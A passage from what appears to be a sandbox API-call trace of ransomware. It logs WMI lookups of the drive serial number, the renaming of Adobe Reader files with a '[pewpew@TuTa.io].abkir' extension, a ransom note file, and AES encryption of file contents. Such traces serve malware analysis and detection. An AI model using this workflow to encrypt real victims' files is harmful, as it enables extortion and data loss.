0x2 [0170.472] WbemDefPath:IUnknown:Release (This=0x6030d30) returned 0x1 [0170.472] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0170.472] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0170.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x6030d30) returned 0x0 [0170.472] WbemDefPath:IUnknown:AddRef (This=0x6030d30) returned 0x3 [0170.472] WbemDefPath:IUnknown:Release (This=0x6030d30) returned 0x2 [0170.472] WbemDefPath:IWbemPath:SetText (This=0x6030d30, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0170.473] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030d30, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0170.473] WbemDefPath:IWbemPath:GetText (in: This=0x6030d30, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0170.473] WbemDefPath:IWbemPath:GetText (in: This=0x6030d30, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0170.473] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0170.473] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0170.473] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0170.473] IUnknown:Release (This=0xb51e34) returned 0x1 [0170.473] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x6023ba0) returned 0x0 [0170.473] WbemLocator:IUnknown:QueryInterface (in: This=0x6023ba0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0170.473] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023ba0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x60276a0) returned 0x0 [0170.473] WbemLocator:IUnknown:Release (This=0x6023ba0) returned 0x0 [0170.474] WbemLocator:IUnknown:QueryInterface (in: This=0x60276a0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x60276a0) returned 0x0 [0170.474] WbemLocator:IUnknown:QueryInterface (in: This=0x60276a0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0170.474] WbemLocator:IUnknown:AddRef (This=0x60276a0) returned 0x3 [0170.474] WbemLocator:IUnknown:QueryInterface (in: This=0x60276a0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0170.474] WbemLocator:IUnknown:QueryInterface (in: This=0x60276a0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0170.474] WbemLocator:IUnknown:QueryInterface (in: This=0x60276a0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0170.474] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0170.474] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0170.474] WbemLocator:IUnknown:QueryInterface (in: This=0x60276a0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0170.474] WbemLocator:IUnknown:Release (This=0x60276a0) returned 0x2 [0170.474] WbemLocator:IUnknown:Release (This=0x60276a0) returned 0x1 [0170.474] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0170.474] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0170.474] WbemLocator:IUnknown:QueryInterface (in: This=0x60276a0, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x60276a0) returned 0x0 [0170.474] WbemLocator:IUnknown:AddRef (This=0x60276a0) returned 0x3 [0170.474] WbemLocator:IUnknown:Release (This=0x60276a0) returned 0x2 [0170.474] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030d30, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0170.474] WbemDefPath:IWbemPath:GetText (in: This=0x6030d30, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0170.474] WbemDefPath:IWbemPath:GetText (in: This=0x6030d30, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0170.474] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x60276c0) returned 0x0 [0170.475] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60276c0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x603331c) returned 0x0 [0171.165] WbemLocator:IUnknown:QueryInterface (in: This=0x603331c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0x66b298c) returned 0x0 [0171.165] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x66b298c, pProxy=0x603331c, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0171.165] WbemLocator:IUnknown:Release (This=0x66b298c) returned 0x1 [0171.165] WbemLocator:IUnknown:QueryInterface (in: This=0x603331c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0x66b29ac) returned 0x0 [0171.165] WbemLocator:IUnknown:QueryInterface (in: This=0x603331c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0x66b298c) returned 0x0 [0171.166] WbemLocator:IClientSecurity:SetBlanket (This=0x66b298c, pProxy=0x603331c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0171.166] WbemLocator:IUnknown:Release (This=0x66b298c) returned 0x2 [0171.166] WbemLocator:IUnknown:Release (This=0x66b29ac) returned 0x1 [0171.166] CoTaskMemFree (pv=0xbd4a38) [0171.166] WbemLocator:IUnknown:Release (This=0x60276c0) returned 0x0 [0171.566] WbemLocator:IUnknown:QueryInterface (in: This=0x603331c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0x66b29ac) returned 0x0 [0171.566] WbemLocator:IUnknown:QueryInterface (in: This=0x66b29ac, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0171.992] WbemLocator:IUnknown:QueryInterface (in: This=0x66b29ac, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0171.993] WbemLocator:IUnknown:AddRef (This=0x66b29ac) returned 0x3 [0171.993] WbemLocator:IUnknown:QueryInterface (in: This=0x66b29ac, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0172.070] WbemLocator:IUnknown:QueryInterface (in: This=0x66b29ac, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0172.071] WbemLocator:IUnknown:QueryInterface (in: This=0x66b29ac, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0x66b290c) returned 0x0 [0172.071] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66b290c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0172.071] WbemLocator:IUnknown:Release (This=0x66b290c) returned 0x3 [0172.071] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0172.071] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0172.071] WbemLocator:IUnknown:QueryInterface (in: This=0x66b29ac, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0x66b2994) returned 0x0 [0172.071] WbemLocator:IRpcOptions:Query (in: This=0x66b2994, pPrx=0x66b29ac, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0172.071] WbemLocator:IUnknown:Release (This=0x66b2994) returned 0x3 [0172.071] WbemLocator:IUnknown:Release (This=0x66b29ac) returned 0x2 [0172.071] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0172.071] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0172.071] WbemLocator:IUnknown:QueryInterface (in: This=0x66b29ac, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x603331c) returned 0x0 [0172.072] WbemLocator:IUnknown:AddRef (This=0x603331c) returned 0x4 [0172.072] WbemLocator:IUnknown:Release (This=0x603331c) returned 0x3 [0172.072] WbemLocator:IUnknown:Release (This=0x603331c) returned 0x2 [0172.072] SysStringLen (param_1=0x0) returned 0x0 [0172.072] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030cc0, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0172.072] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0172.072] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0172.072] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0172.072] WbemLocator:IUnknown:AddRef (This=0x66b29ac) returned 0x3 [0172.072] WbemLocator:IUnknown:QueryInterface (in: This=0x66b29ac, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0x66b29ac) returned 0x0 [0172.072] WbemLocator:IUnknown:Release (This=0x66b29ac) returned 0x3 [0172.072] WbemLocator:IUnknown:Release (This=0x66b29ac) returned 0x2 [0172.072] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0172.072] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0172.072] IWbemServices:GetObject (in: This=0x603331c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x6028978, ppCallResult=0x0) returned 0x0 [0173.653] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030d30, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0173.653] WbemDefPath:IWbemPath:GetText (in: This=0x6030d30, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0173.653] WbemDefPath:IWbemPath:GetText (in: This=0x6030d30, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0173.653] IWbemClassObject:Get (in: This=0x6028978, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x35f49cc*=0, plFlavor=0x35f49d0*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x35f49cc*=8, plFlavor=0x35f49d0*=0) returned 0x0 [0173.654] SysStringByteLen (bstr="9C354B42") returned 0x10 [0173.654] SysStringByteLen (bstr="9C354B42") returned 0x10 [0173.654] IWbemClassObject:Get (in: This=0x6028978, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x35f49cc*=8, plFlavor=0x35f49d0*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x35f49cc*=8, plFlavor=0x35f49d0*=0) returned 0x0 [0173.654] SysStringByteLen (bstr="9C354B42") returned 0x10 [0173.654] SysStringByteLen (bstr="9C354B42") returned 0x10 [0173.654] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm", lpFilePart=0x0) returned 0x35 [0173.654] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x58 [0173.654] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0173.654] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\liesmich.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x21643a20, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0173.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0173.654] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\liesmich.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\liesmich.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0173.696] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm", lpFilePart=0x0) returned 0x35 [0173.696] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0173.696] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0173.696] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0173.696] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0173.697] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm", lpFilePart=0x0) returned 0x35 [0173.697] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0173.697] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lisezmoi.htm"), fInfoLevelId=0x0, lpFileInformation=0x35f4efc | out: lpFileInformation=0x35f4efc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f82a560, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x43c7)) returned 1 [0173.701] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0173.702] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm", lpFilePart=0x0) returned 0x35 [0173.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0173.702] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lisezmoi.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a0 [0173.702] GetFileType (hFile=0x5a0) returned 0x1 [0173.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0173.702] GetFileType (hFile=0x5a0) returned 0x1 [0173.702] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x43c7 [0173.702] ReadFile (in: hFile=0x5a0, lpBuffer=0x35f50cc, nNumberOfBytesToRead=0x43c7, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x35f50cc*, lpNumberOfBytesRead=0x8f6eedc*=0x43c7, lpOverlapped=0x0) returned 1 [0173.729] CloseHandle (hObject=0x5a0) returned 1 [0173.729] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0x66ba850) returned 1 [0173.731] CryptGenRandom (in: hProv=0x66ba850, dwLen=0x10, pbBuffer=0x35f9b58 | out: pbBuffer=0x35f9b58) returned 1 [0175.290] CryptImportKey (in: hProv=0x66ba850, pbData=0x368e868, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7f010) returned 1 [0175.290] CryptContextAddRef (hProv=0x66ba850, pdwReserved=0x0, dwFlags=0x0) returned 1 [0175.291] CryptContextAddRef (hProv=0x66ba850, pdwReserved=0x0, dwFlags=0x0) returned 1 [0175.291] CryptDuplicateKey (in: hKey=0xb7f010, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7f6d0) returned 1 [0175.291] CryptContextAddRef (hProv=0x66ba850, pdwReserved=0x0, dwFlags=0x0) returned 1 [0175.291] CryptSetKeyParam (hKey=0xb7f6d0, dwParam=0x4, pbData=0x368e948*=0x1, dwFlags=0x0) returned 1 [0175.291] CryptSetKeyParam (hKey=0xb7f6d0, dwParam=0x1, pbData=0x368e914, dwFlags=0x0) returned 1 [0175.291] CryptEncrypt (in: hKey=0xb7f6d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x368e958*, pdwDataLen=0x8f6eea8*=0x43d0, dwBufLen=0x43d0 | out: pbData=0x368e958*, pdwDataLen=0x8f6eea8*=0x43d0) returned 1 [0175.291] CryptEncrypt (in: hKey=0xb7f6d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3692d4c*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x3692d4c*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0175.293] CryptDestroyKey (hKey=0xb7f010) returned 1 [0175.293] CryptReleaseContext (hProv=0x66ba850, dwFlags=0x0) returned 1 [0175.293] CryptReleaseContext (hProv=0x66ba850, dwFlags=0x0) returned 1 [0175.293] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 